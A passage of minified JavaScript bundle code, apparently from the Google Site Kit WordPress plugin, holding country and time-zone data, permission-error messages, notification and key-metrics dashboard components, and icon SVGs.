Caicos Islands",defaultTimeZoneId:"America/Grand_Turk",timeZone:[{timeZoneId:"America/Grand_Turk",displayName:"(GMT-04:00) Turks & Caicos Islands Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"TV",displayName:"Tuvalu",defaultTimeZoneId:"Pacific/Funafuti",timeZone:[{timeZoneId:"Pacific/Funafuti",displayName:"(GMT+12:00) Tuvalu Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"UM",displayName:"U.S. Outlying Islands",defaultTimeZoneId:"Pacific/Wake",timeZone:[{timeZoneId:"Pacific/Wake",displayName:"(GMT+12:00) Wake Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"UA",displayName:"Ukraine",defaultTimeZoneId:"Europe/Kiev",timeZone:[{timeZoneId:"Europe/Kiev",displayName:"(GMT+03:00) Ukraine Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"AE",displayName:"United Arab Emirates",defaultTimeZoneId:"Asia/Dubai",timeZone:[{timeZoneId:"Asia/Dubai",displayName:"(GMT+04:00) United Arab Emirates Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"GB",displayName:"United Kingdom",defaultTimeZoneId:"Etc/GMT",timeZone:[{timeZoneId:"Etc/GMT",displayName:"(GMT+00:00) GMT"},{timeZoneId:"Europe/London",displayName:"(GMT+01:00) United Kingdom Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"US",displayName:"United States",defaultTimeZoneId:"America/Los_Angeles",timeZone:[{timeZoneId:"Pacific/Honolulu",displayName:"(GMT-10:00) Honolulu Time"},{timeZoneId:"America/Anchorage",displayName:"(GMT-08:00) Anchorage Time"},{timeZoneId:"America/Los_Angeles",displayName:"(GMT-07:00) Los Angeles Time"},{timeZoneId:"America/Boise",displayName:"(GMT-06:00) Boise Time"},{timeZoneId:"America/Denver",displayName:"(GMT-06:00) Denver Time"},{timeZoneId:"America/Phoenix",displayName:"(GMT-07:00) Phoenix Time"},{timeZoneId:"America/Chicago",displayName:"(GMT-05:00) Chicago Time"},{timeZoneId:"America/Detroit",displayName:"(GMT-04:00) Detroit Time"},{timeZoneId:"America/New_York",displayName:"(GMT-04:00) New York Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"UY",displayName:"Uruguay",defaultTimeZoneId:"America/Montevideo",timeZone:[{timeZoneId:"America/Montevideo",displayName:"(GMT-03:00) Uruguay Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"UZ",displayName:"Uzbekistan",defaultTimeZoneId:"Asia/Tashkent",timeZone:[{timeZoneId:"Asia/Tashkent",displayName:"(GMT+05:00) Uzbekistan Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"VU",displayName:"Vanuatu",defaultTimeZoneId:"Pacific/Efate",timeZone:[{timeZoneId:"Pacific/Efate",displayName:"(GMT+11:00) Vanuatu Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"VA",displayName:"Vatican City",defaultTimeZoneId:"Europe/Vatican",timeZone:[{timeZoneId:"Europe/Vatican",displayName:"(GMT+02:00) Vatican City Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"VE",displayName:"Venezuela",defaultTimeZoneId:"America/Caracas",timeZone:[{timeZoneId:"America/Caracas",displayName:"(GMT-04:00) Venezuela Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"VN",displayName:"Vietnam",defaultTimeZoneId:"Asia/Saigon",timeZone:[{timeZoneId:"Asia/Saigon",displayName:"(GMT+07:00) Vietnam Time"}],tosLocale:{language:"vi",country:"VN"}},{countryCode:"WF",displayName:"Wallis & Futuna",defaultTimeZoneId:"Pacific/Wallis",timeZone:[{timeZoneId:"Pacific/Wallis",displayName:"(GMT+12:00) Wallis & Futuna Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"EH",displayName:"Western Sahara",defaultTimeZoneId:"Africa/El_Aaiun",timeZone:[{timeZoneId:"Africa/El_Aaiun",displayName:"(GMT+01:00) Western Sahara Time"}],tosLocale:{language:"en",country:"GB"}}],o=s.reduce((e,t)=>(e[t.countryCode]=t.timeZone,e),{}),n=(0,a.keyBy)(s,"countryCode"),r=s.reduce((e,t)=>(t.timeZone.forEach(({timeZoneId:i})=>e[i]=t.countryCode),e),{})},30805:(e,t,i)=>{"use strict";i.d(t,{i:()=>n});var a=i(63696),s=i(79961),o=i(84895);function n(e){const t=(0,a.useContext)(s.A);return(0,o.G)(e,t)}},31012:(e,t,i)=>{"use strict";i.d(t,{c:()=>n});var a=i(82871),s=i(32803),o=i(22942);function n(e="",t={}){const{slug:i="",name:n="",owner:r={}}=t||{};if(!i||!n)return e;let l="",c="";return o.L1===i?e.match(/account/i)?l=(0,a.__)("Your Google account does not have sufficient permissions for this Analytics account, so you won’t be able to see stats from it on the Site Kit dashboard.","google-site-kit"):e.match(/property/i)?l=(0,a.__)("Your Google account does not have sufficient permissions for this Analytics property, so you won’t be able to see stats from it on the Site Kit dashboard.","google-site-kit"):e.match(/view/i)&&(l=(0,a.__)("Your Google account does not have sufficient permissions for this Analytics view, so you won’t be able to see stats from it on the Site Kit dashboard.","google-site-kit")):s.Y===i&&(l=(0,a.__)("Your Google account does not have sufficient permissions for this Search Console property, so you won’t be able to see stats from it on the Site Kit dashboard.","google-site-kit")),l||(l=(0,a.sprintf)(/* translators: %s: module name */ /* translators: %s: module name */ (0,a.__)("Your Google account does not have sufficient permissions to access %s data, so you won’t be able to see stats from it on the Site Kit dashboard.","google-site-kit"),n)),r&&r.login&&(c=(0,a.sprintf)(/* translators: %s: owner name */ /* translators: %s: owner name */ (0,a.__)('This service was originally connected by the administrator "%s" — you can contact them for more information.',"google-site-kit"),r.login)),c||(c=(0,a.__)("This service was originally connected by an administrator — you can contact them for more information.","google-site-kit")),`${l} ${c}`}},32600:(e,t,i)=>{"use strict";i.d(t,{A:()=>NoticeNotification});var a=i(25797),s=i(68761),o=i(50539),n=i(8732),r=i(10740),l=i(62688),c=i.n(l),d=i(62540);function NoticeNotification({notificationID:e,children:t,dismissButton:i,ctaButton:l,gaTrackingEventArgs:c,...g}){const u=(0,s.A)(e),{dismissNotification:m}=(0,o.useDispatch)(n.D);return(0,d.jsx)(r.xA,{children:(0,d.jsx)(r.fI,{children:(0,d.jsx)(r.fh,{size:12,alignMiddle:!0,children:(0,d.jsx)(a.A,{dismissButton:{...i,onClick:async function(t){await(i?.onClick?.(t)),u.dismiss(c?.label,c?.value),m(e,{...i?.dismissOptions||{}})}},ctaButton:{...l,onClick:async function(t){u.confirm(c?.label,c?.value),await(l?.onClick?.(t)),l?.dismissOnClick&&m(e,{...l?.dismissOptions})}},...g,children:t})})})})}NoticeNotification.propTypes={notificationID:c().string.isRequired,children:c().node,dismissButton:c().oneOfType([c().bool,c().object]),ctaButton:c().object,gaTrackingEventArgs:c().object}},32803:(e,t,i)=>{"use strict";i.d(t,{Y:()=>a});const a="search-console"},32981:(e,t,i)=>{"use strict";i.d(t,{Ii:()=>d,sq:()=>c.s,ph:()=>s,Hb:()=>o,H5:()=>r,Aj:()=>l.A,JN:()=>g});var a=i(82871);function s(e,t={}){const{keyColumnIndex:i=0,maxSlices:s,withOthers:o=!1,tooltipCallback:n}=t,{rows:r=[]}=e||{},l="function"==typeof n,c=["Source","Percent"];l&&c.push({type:"string",role:"tooltip",p:{html:!0}});const d=[c],g=r.filter(({dimensionValues:e})=>"date_range_0"===e[1].value),u=g.reduce((e,t)=>e+parseInt(t.metricValues[0].value,10),0),m=r.filter(({dimensionValues:e})=>"date_range_1"===e[1].value),p=m.reduce((e,t)=>e+parseInt(t.metricValues[0].value,10),0);let I=o,h=g.length,y=u,A=p;s>0?(I=o&&g.length>s,h=Math.min(g.length,I?s-1:s)):(I=!1,h=g.length);for(let e=0;e<h;e++){const t=g[e],a=t.metricValues[i].value,s=m.find(({dimensionValues:e})=>e[0].value===t.dimensionValues[0].value);y-=a,A-=s?s.metricValues[i].value:0;const o=u>0?a/u:0,c=[t.dimensionValues[0].value,o];if(l){const e=r.find(({dimensionValues:e})=>"date_range_1"===e[1].value&&e[0].value===t.dimensionValues[0].value);c.push(n(t,e,c))}d.push(c)}if(I&&y>0){const e=[(0,a.__)("Others","google-site-kit"),y/u];l&&e.push(n({metricValues:[{value:y}]},{metricValues:[{value:A}]},e)),d.push(e)}return d}function o(e){if(void 0===e)return;const t=(e?.rows||[]).filter(({dimensionValues:e})=>"date_range_0"===e[1].value);return 1===t?.length||t?.[0]?.metricValues?.[0]?.value===e?.totals?.[0]?.metricValues?.[0]?.value}var n=i(17243);function r(e){if(void 0!==e)return!(e?.rows&&e?.totals&&!e?.totals?.every(n.isEmpty))||!e.totals.some(e=>!!e.metricValues&&e.metricValues.some(({value:e})=>e>0))}var l=i(65379),c=(i(25427),i(74508));function d(e){return e.replace(/&/gi,"&")}function g(e){return d(e).split("; ")}},33052:(e,t,i)=>{"use strict";i.d(t,{A:()=>Typography});var a=i(62688),s=i.n(a),o=i(4452),n=i.n(o),r=i(8513),l=i(62540);function Typography({className:e,type:t,size:i,as:a="span",children:s,...o}){return(0,l.jsx)(a,{className:n()("googlesitekit-typography",e,{[`googlesitekit-typography--${t}`]:t&&r.tT.includes(t),[`googlesitekit-typography--${i}`]:i&&r.oJ.includes(i)}),...o,children:s})}Typography.propTypes={className:s().string,type:s().oneOf(r.tT),size:s().oneOf(r.oJ),as:s().oneOfType([s().string,s().elementType])}},33610:(e,t,i)=>{"use strict";i.d(t,{i$:()=>ChangeMetricsLink,kB:()=>InsufficientPermissionsError,uQ:()=>D,ym:()=>MetricTileNumeric,$:()=>MetricTileTable,mF:()=>MetricTileTablePlainText,sq:()=>G.A,sB:()=>w.A});var a=i(63696),s=i(82871),o=i(50539),n=i(7972),r=i(97345),l=i(7144),c=i(38432),d=i(674),g=i(29785),u=i(6109),m=i(89065),p=i(62540);function SetupCompletedSurveyTrigger(){const e=(0,o.useSelect)(e=>e(g.O4).isKeyMetricsSetupCompleted()),t=(0,o.useSelect)(e=>e(g.O4).getKeyMetricsSetupCompletedBy()),i=(0,o.useSelect)(e=>e(r.oR).getID());return e?(0,p.jsxs)(a.Fragment,{children:[(0,p.jsx)(m.A,{triggerID:"view_kmw",ttl:u.Du}),t===i&&(0,p.jsx)(m.A,{triggerID:"view_kmw_setup_completed",ttl:u.Du})]}):null}var I=i(62659),h=i(20697);const y={slug:"sharedKeyMetrics",contexts:[h.jU,h.Ax,h.f7,h.Is],gaEventCategory:e=>`${e}_shared_key-metrics`,steps:[{target:".googlesitekit-km-change-metrics-cta",title:(0,s.__)("Personalize your key metrics","google-site-kit"),content:(0,s.__)("Another admin has set up these tailored metrics for your site. Click here to personalize them.","google-site-kit"),placement:"bottom-start"}]};function ChangeMetricsLink(){const e=(0,o.useSelect)(e=>e(r.oR).getKeyMetrics()),t=(0,I.A)(),{setValue:i}=(0,o.useDispatch)(n.n),m=(0,a.useCallback)(()=>{i(l.EA,!0),(0,u.sx)(`${t}_kmw`,"change_metrics")},[i,t]),h=Array.isArray(e)&&e?.length>0;return function({renderChangeMetricLink:e}){const t=(0,o.useSelect)(e=>e(g.O4).getKeyMetricsSetupCompletedBy()),i=(0,o.useSelect)(e=>e(r.oR).getID()),{triggerOnDemandTour:s}=(0,o.useDispatch)(r.oR),n=Number.isInteger(t)&&Number.isInteger(i)&&t>0&&i!==t;(0,a.useEffect)(()=>{e&&n&&s(y)},[e,n,s])}({renderChangeMetricLink:h}),h?(0,p.jsxs)(a.Fragment,{children:[(0,p.jsx)(c.A,{className:"googlesitekit-widget-area__cta-link googlesitekit-km-change-metrics-cta",onClick:m,leadingIcon:(0,p.jsx)(d.A,{width:22,height:22}),secondary:!0,linkButton:!0,children:(0,s.__)("Change metrics","google-site-kit")}),(0,p.jsx)(SetupCompletedSurveyTrigger,{})]}):null}var A=i(62688),M=i.n(A),N=i(13606),f=i(60947);function InsufficientPermissionsError(e){const{moduleSlug:t,onRetry:i,infoTooltip:n,headerText:r}=e,l=(0,I.A)(),d=(0,o.useSelect)(e=>e(g.O4).getErrorTroubleshootingLinkURL({code:`${t}_insufficient_permissions`}));(0,a.useEffect)(()=>{(0,u.BI)(`${l}_kmw`,"insufficient_permissions_error")},[l]);const m=(0,a.useCallback)(()=>{(0,u.sx)(`${l}_kmw`,"insufficient_permissions_error_retry"),i?.()},[i,l]);return(0,p.jsx)(f.A,{title:(0,s.__)("Insufficient permissions","google-site-kit"),headerText:r,infoTooltip:n,children:(0,p.jsxs)("div",{className:"googlesitekit-report-error-actions",children:[(0,p.jsx)("span",{className:"googlesitekit-error-retry-text",children:(0,N.A)((0,s.__)("Permissions updated? <a>Retry</a>","google-site-kit"),{a:(0,p.jsx)(c.A,{onClick:m})})}),(0,p.jsx)("span",{className:"googlesitekit-error-retry-text",children:(0,N.A)((0,s.__)("You’ll need to contact your administrator. <a>Learn more</a>","google-site-kit"),{a:(0,p.jsx)(c.A,{href:d,external:!0,hideExternalIndicator:!0})})})]})})}InsufficientPermissionsError.propTypes={moduleSlug:M().string.isRequired,onRetry:M().func.isRequired,headerText:M().string,infoTooltip:M().string};var T=i(63560),S=i(70301),k=i(22942),j=i(65385),v=i(17443),b=i(12813),_=i(83891),x=i(73881),C=i(85284);function KeyMetricsSetupCTAWidget({Widget:e,WidgetNull:t}){const i=(0,a.useRef)(),n=(0,I.A)(),d=`${n}_kmw-cta-notification`,m=(0,b.A)(),h=(0,o.useSelect)(e=>e(g.O4).getAdminURL("googlesitekit-user-input")),y=(0,o.useSelect)(e=>e(g.O4).getAdminURL("googlesitekit-metric-selection")),A=(0,o.useSelect)(e=>h&&e(S.M).isNavigatingTo(h)),M=(0,T.A)(i,{threshold:.25}),[N,f]=(0,a.useState)(!1),k=!!M?.intersectionRatio,{triggerSurvey:j}=(0,o.useDispatch)(r.oR);(0,a.useEffect)(()=>{k&&!N&&((0,u.sx)(`${n}_kmw-cta-notification`,"view_notification"),j("view_kmw_setup_cta",{ttl:u.Du}),f(!0))},[k,N,n,j]);const D={tooltipSlug:l.Uf,title:(0,s.__)("You can always set up goals in Settings later","google-site-kit"),content:(0,s.__)("The Key Metrics section will be added back to your dashboard once you set your goals in Settings","google-site-kit"),dismissLabel:(0,s.__)("Got it","google-site-kit")},E=(0,v.i)(D),{dismissItem:w}=(0,o.useDispatch)(r.oR),Z=(0,a.useCallback)(async()=>{await(0,u.sx)(d,"dismiss_notification"),E(),await w(l.Uf)},[d,E,w]),{navigateTo:R}=(0,o.useDispatch)(S.M),L=(0,a.useCallback)(async()=>{await(0,u.sx)(d,"confirm_pick_own_metrics"),await w(l.Uf),R(y)},[d,w,R,y]),G=(0,a.useCallback)(async()=>{await(0,u.sx)(d,"confirm_get_tailored_metrics"),await w(l.Uf),R(h)},[d,w,R,h]);return m?(0,p.jsx)(e,{noPadding:!0,children:(0,p.jsx)(_.A,{ref:i,className:"googlesitekit-banner--setup-cta",title:(0,s.__)("Get personalized suggestions for user interaction metrics based on your goals","google-site-kit"),description:(0,s.__)("Answer 3 questions and we’ll suggest relevant metrics for your dashboard. These metrics will help you track how users interact with your site.","google-site-kit"),dismissButton:{label:(0,s.__)("Maybe later","google-site-kit"),onClick:Z},ctaButton:{label:(0,s.__)("Get tailored metrics","google-site-kit"),onClick:G,disabled:A,inProgress:A},svg:{desktop:x.A,mobile:C.A,verticalPosition:"top"},footer:(0,p.jsxs)("div",{className:"googlesitekit-widget-key-metrics-footer",children:[(0,p.jsx)("span",{children:(0,s.__)("Interested in specific metrics?","google-site-kit")}),(0,p.jsx)(c.A,{onClick:L,children:(0,s.__)("Select your own metrics","google-site-kit")})]})})}):(0,p.jsx)(t,{})}KeyMetricsSetupCTAWidget.propTypes={Widget:M().elementType.isRequired,WidgetNull:M().elementType};const D=(0,j.A)({moduleName:k.L1})(KeyMetricsSetupCTAWidget);var E=i(74655),w=i(95806);function MetricTileNumeric({metricValue:e,metricValueFormat:t,subText:i,previousValue:a,currentValue:s,...o}){const n=(0,u.mK)(t);return(0,p.jsxs)(w.A,{className:"googlesitekit-km-widget-tile--numeric",...o,children:[(0,p.jsxs)("div",{className:"googlesitekit-km-widget-tile__metric-container",children:[(0,p.jsx)("div",{className:"googlesitekit-km-widget-tile__metric",children:(0,u.Eo)(e,n)}),(0,p.jsx)("p",{className:"googlesitekit-km-widget-tile__subtext",children:i})]}),(0,p.jsx)("div",{className:"googlesitekit-km-widget-tile__metric-change-container",children:(0,p.jsx)(E.A,{previousValue:a,currentValue:s,isAbsolute:"percent"===n?.style})})]})}MetricTileNumeric.propTypes={metricValue:M().oneOfType([M().string,M().number]),metricValueFormat:M().oneOfType([M().string,M().object]),subtext:M().string,previousValue:M().number,currentValue:M().number};var Z=i(17243),R=i(4452),L=i.n(R);function MetricTileTable({rows:e=[],columns:t=[],limit:i,ZeroState:a,...s}){let o=null;return e?.length>0?o=e.slice(0,i||e.length).map((e,i)=>(0,p.jsx)("div",{className:"googlesitekit-table__body-row",children:t.map(({Component:t,field:i,className:a},s)=>{const o=void 0!==i?(0,Z.get)(e,i):void 0;return(0,p.jsxs)("div",{className:L()("googlesitekit-table__body-item",a),children:[t&&(0,p.jsx)(t,{row:e,fieldValue:o}),!t&&o]},s)})},i)):a&&(o=(0,p.jsx)("div",{className:"googlesitekit-table__body-row googlesitekit-table__body-row--no-data",children:(0,p.jsx)("div",{className:"googlesitekit-table__body-zero-data",children:(0,p.jsx)(a,{})})})),(0,p.jsx)(w.A,{className:"googlesitekit-km-widget-tile--table",...s,children:(0,p.jsx)("div",{className:"googlesitekit-km-widget-tile__table",children:o})})}function MetricTileTablePlainText({content:e}){return(0,p.jsx)("p",{className:"googlesitekit-km-widget-tile__table-plain-text",children:e})}MetricTileTable.propTypes={rows:M().array,columns:M().array,limit:M().number,ZeroState:M().elementType},MetricTileTablePlainText.propTypes={content:M().string.isRequired};var G=i(21018);i(12666)},33903:(e,t,i)=>{"use strict";i.d(t,{A:()=>OverlayNotification});var a=i(62688),s=i.n(a),o=i(50539),n=i(8732),r=i(68761),l=i(5230),c=i(4452),d=i.n(c),g=i(97513),u=i(63696),m=i(33052),p=i(62540);function Title({children:e}){return(0,p.jsx)(m.A,{as:"h3",size:"medium",type:"title",className:"googlesitekit-overlay-card__title",children:e})}function Description({children:e}){return(0,p.jsx)("p",{className:"googlesitekit-overlay-card__description",children:e})}Title.propTypes={children:s().node.isRequired},Description.propTypes={children:s().node.isRequired};var I=i(82871),h=i(49383);function DismissButton({label:e=(0,I.__)("Maybe later","google-site-kit"),onClick:t,disabled:i}){return(0,p.jsx)(h.Button,{onClick:t,disabled:i,tertiary:!0,children:e})}const y={label:s().string,onClick:s().func,disabled:s().bool};function CTAButton(e){const{label:t,...i}=e;return(0,p.jsx)(h.Button,{...i,children:t})}DismissButton.propTypes=y,CTAButton.propTypes={...y,href:s().string,target:s().string,trailingIcon:s().object};var A=i(60515);function Body({title:e,description:t,ctaButton:i,dismissButton:a,GraphicDesktop:s,GraphicMobile:o,newBadge:n}){const r=(0,g.dv)();return(0,p.jsxs)(u.Fragment,{children:[r!==g.mp&&s&&(0,p.jsx)("div",{className:"googlesitekit-overlay-card__graphic",children:(0,p.jsx)(s,{})}),(0,p.jsxs)("div",{className:"googlesitekit-overlay-card__body",children:[n&&(0,p.jsx)("div",{className:"googlesitekit-overlay-card__badge",children:(0,p.jsx)(A.A,{hasNoSpacing:!0})}),e&&(0,p.jsx)(Title,{children:e}),t&&(0,p.jsx)(Description,{children:t})]}),(i||a)&&(0,p.jsxs)("div",{className:"googlesitekit-overlay-card__actions",children:[a&&(0,p.jsx)(DismissButton,{...a}),i&&(0,p.jsx)(CTAButton,{...i})]}),r===g.mp&&o&&(0,p.jsx)(o,{})]})}function OverlayCard(e){const{visible:t,className:i,...a}=e,s=(0,g.dv)();if(!t)return null;const o=(0,p.jsx)("div",{className:d()("googlesitekit-overlay-card",i),children:(0,p.jsx)(Body,{...a})});return s===g.mp?o:(0,p.jsx)(l.A,{direction:"up",in:t,children:o})}function OverlayNotification({notificationID:e,ctaButton:t,dismissButton:i,gaTrackingEventArgs:a,...s}){const l=(0,r.A)(e,a?.category,{confirmAction:a?.confirmAction,dismissAction:a?.dismissAction}),{dismissNotification:c}=(0,o.useDispatch)(n.D);const{dismissOnClick:d,dismissOptions:g,...u}=t||{};const m=t?{...u,onClick:async function(i){l.confirm(a?.label,a?.value),await(t?.onClick?.(i)),d&&c(e,{...g})}}:void 0;return(0,p.jsx)(OverlayCard,{ctaButton:m,dismissButton:{...i,onClick:async function(t){await(i?.onClick?.(t)),l.dismiss(a?.label,a?.value),c(e,{...i.dismissOptions})}},...s,visible:!0})}Body.propTypes={title:s().node,description:s().node,ctaButton:s().shape({...y,href:s().string,target:s().string,trailingIcon:s().element}),dismissButton:s().shape({...y}),GraphicDesktop:s().elementType,GraphicMobile:s().elementType,newBadge:s().bool},OverlayCard.propTypes={className:s().string,title:s().string,description:s().oneOfType([s().string,s().object]),ctaButton:s().shape({...y,href:s().string,target:s().string,trailingIcon:s().object}),dismissButton:s().shape(y),GraphicDesktop:s().elementType,GraphicMobile:s().elementType,newBadge:s().bool,visible:s().bool},OverlayCard.defaultProps={visible:!1},OverlayNotification.propTypes={notificationID:s().string,ctaButton:s().object,dismissButton:s().oneOfType([s().object,s().bool])}},35410:(e,t,i)=>{"use strict";i.d(t,{A:()=>SetupPluginConversionTrackingNotice});var a=i(4452),s=i.n(a),o=i(50539),n=i(29785),r=i(62540);function SetupPluginConversionTrackingNotice({className:e,message:t}){const i=(0,o.useSelect)(e=>e(n.O4).isConversionTrackingEnabled());return i||void 0===i?null:(0,r.jsx)("p",{className:s()(e,"googlesitekit-color--surfaces-on-background-variant googlesitekit-plugin-conversion-tracking-notice"),children:t})}},35812:(e,t,i)=>{"use strict";i.d(t,{U:()=>I});var a=i(32091),s=i.n(a),o=i(17243),n=i(73866),r=i(74426),l=i(6109),c=i(50539);function d(e){return e}function g(){return{}}function u(){}const{clearError:m,receiveError:p}=n.o1;function I({baseName:e,controlCallback:t,reducerCallback:i=d,argsToParams:a=g,validateParams:n=u}){let I;s()(e,"baseName is required."),s()("function"==typeof t,"controlCallback is required and must be a function."),s()("function"==typeof i,"reducerCallback must be a function."),s()("function"==typeof a,"argsToParams must be a function."),s()("function"==typeof n,"validateParams must be a function.");try{n(a()),I=!1}catch(e){I=!0}const h=(0,r.m2)(e),y=(0,r.sP)(e),A=`FETCH_${y}`,M=`START_${A}`,N=`FINISH_${A}`,f=`CATCH_${A}`,T=`RECEIVE_${y}`,S=`fetch${h}`,k=`receive${h}`,j=`isFetching${h}`,v={[j]:{}};const b={[S](...t){const i=a(...t);return n(i),function*(t,i){let a,s;yield{payload:{params:t},type:M},yield m(e,i);try{a=yield{payload:{params:t},type:A},yield b[k](a,t),yield{payload:{params:t},type:N}}catch(a){s=a,yield p(s,e,i),yield{payload:{params:t},type:f}}return{response:a,error:s}}(i,t)},[k]:(e,t)=>(s()(void 0!==e,"response is required."),I?(s()((0,o.isPlainObject)(t),"params is required."),n(t)):t={},{payload:{response:e,params:t},type:T})},_={[A]:({payload:e})=>t(e.params)},x=(0,c.createReducer)((e,{type:t,payload:a})=>{switch(t){case M:{const{params:t}=a;return e[j]=e[j]||{},e[j][(0,l.Zm)(t)]=!0,e}case T:{const{response:t,params:s}=a;return i(e,t,s)}case N:{const{params:t}=a;return e[j]=e[j]||{},e[j][(0,l.Zm)(t)]=!1,e}case f:{const{params:t}=a;return e[j]=e[j]||{},e[j][(0,l.Zm)(t)]=!1,e}default:return e}});return{initialState:v,actions:b,controls:_,reducer:x,resolvers:{},selectors:{[j]:(e,...t)=>{if(void 0===e[j])return!1;let i;try{i=a(...t),n(i)}catch(e){return!1}return!!e[j][(0,l.Zm)(i)]}}}}},35952:(e,t,i)=>{"use strict";i.d(t,{Ap:()=>g,IY:()=>l,J4:()=>p,LE:()=>r,O0:()=>c,OT:()=>u,RR:()=>d,Tt:()=>m,_L:()=>n,f2:()=>s,jb:()=>o,wl:()=>a});const a="modules/adsense",s=0,o="READY",n="NEEDS_ATTENTION",r="REQUIRES_REVIEW",l="GETTING_READY",c="background-submit-suspended",d="adsenseAdBlockingFormSettings",g="googlesitekit-ad-blocking-recovery-setup-create-message-cta-clicked",u="ad-blocking-recovery-notification",m={TAG_PLACED:"tag-placed",SETUP_CONFIRMED:"setup-confirmed"},p={PLACE_TAGS:0,CREATE_MESSAGE:1,COMPLETE:2}},37133:(e,t,i)=>{"use strict";i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var a=i(63696);const __WEBPACK_DEFAULT_EXPORT__=function(e,t){const[s,o]=(0,a.useState)(null);return(0,a.useEffect)(()=>{if(e.current&&"function"==typeof i.g.IntersectionObserver){function a(e){o(e[e.length-1])}const s=new i.g.IntersectionObserver(a,t);return s.observe(e.current),()=>{o(null),s.disconnect()}}return()=>{}},[e.current,t.threshold,t.root,t.rootMargin]),s}},37467:(e,t,i)=>{"use strict";i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var a=i(63696),s=i(82286),o=i(51568);const __WEBPACK_DEFAULT_EXPORT__=function(e,t,n=i.g){const[r,l]=(0,a.useState)((0,s.d)(n.location.href,e)||t);return[r,function(t){l(t);const i=(0,o.F)(n.location.href,{[e]:t});n.history.replaceState(null,"",i)}]}},37834:(e,t,i)=>{"use strict";i.d(t,{A:()=>Notifications});var a=i(62688),s=i.n(a),o=i(50539),n=i(62659),r=i(8732),l=i(84730),c=i(50532),d=i.n(c),g=i(67438),u=i(62540);const m=d()(e=>({id:e,Notification:p(e)(g.A)}));function p(e){return t=>{function WithNotificationID(i){return(0,u.jsx)(t,{...i,id:e})}return WithNotificationID.displayName="WithNotificationID",(t.displayName||t.name)&&(WithNotificationID.displayName+=`(${t.displayName||t.name})`),WithNotificationID}}function Notifications({areaSlug:e,groupID:t=l.He.DEFAULT}){const i=(0,n.A)(),a=(0,o.useSelect)(e=>e(r.D).getQueuedNotifications(i,t));if(void 0===a?.[0]||a?.[0]?.areaSlug!==e)return null;const{id:s,Component:c}=a[0],d={...m(s)};return(0,u.jsx)(c,{...d})}Notifications.propTypes={viewContext:s().string,areaSlug:s().string}},38017:(e,t,i)=>{"use strict";i.d(t,{A:()=>l});var a=i(62688),s=i.n(a),o=i(4452),n=i.n(o),r=i(62540);function ChangeArrow({direction:e,invertColor:t,width:i,height:a}){return(0,r.jsx)("svg",{className:n()("googlesitekit-change-arrow",`googlesitekit-change-arrow--${e}`,{"googlesitekit-change-arrow--inverted-color":t}),width:i,height:a,viewBox:"0 0 10 10",fill:"none",xmlns:"http://www.w3.org/2000/svg",children:(0,r.jsx)("path",{d:"M5.625 10L5.625 2.375L9.125 5.875L10 5L5 -1.76555e-07L-2.7055e-07 5L0.875 5.875L4.375 2.375L4.375 10L5.625 10Z",fill:"currentColor"})})}ChangeArrow.propTypes={direction:s().string,invertColor:s().bool,width:s().number,height:s().number},ChangeArrow.defaultProps={direction:"up",invertColor:!1,width:9,height:9};const l=ChangeArrow},38432:(e,t,i)=>{"use strict";i.d(t,{A:()=>_});var a,s=i(4452),o=i.n(s),n=i(62688),r=i.n(n),l=i(39941),c=i(63696),d=i(82871);function g(){return g=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},g.apply(null,arguments)}const u=e=>c.createElement("svg",g({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 13 13"},e),a||(a=c.createElement("g",{fill:"none",fillRule:"evenodd"},c.createElement("circle",{cx:6.5,cy:6.5,r:6.5,fill:"currentColor"}),c.createElement("path",{fill:"#FFF",d:"M3.461 6.96h5.15L6.36 9.21a.464.464 0 0 0 .325.79.46.46 0 0 0 .325-.135l3.037-3.038a.46.46 0 0 0 0-.65L7.015 3.135a.46.46 0 0 0-.65.65L8.61 6.039H3.461a.46.46 0 0 0-.461.46c0 .254.207.462.461.462z"}),".")));var m;function p(){return p=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},p.apply(null,arguments)}const I=e=>c.createElement("svg",p({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 13 13"},e),m||(m=c.createElement("g",{fill:"none",fillRule:"evenodd"},c.createElement("circle",{cx:6.5,cy:6.5,r:6.5,fill:"#FFF"}),c.createElement("path",{fill:"currentColor",d:"M3.461 6.96h5.15L6.36 9.21a.464.464 0 0 0 .325.79.46.46 0 0 0 .325-.135l3.037-3.038a.46.46 0 0 0 0-.65L7.015 3.135a.46.46 0 0 0-.65.65L8.61 6.039H3.461a.46.46 0 0 0-.461.46c0 .254.207.462.461.462z"}),".")));var h;function y(){return y=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},y.apply(null,arguments)}const A=e=>c.createElement("svg",y({xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},e),h||(h=c.createElement("path",{d:"m12 20-8-8 8-8 1.425 1.4-5.6 5.6H20v2H7.825l5.6 5.6z"})));var M=i(83366),N=i(50304),f=i(62540);const 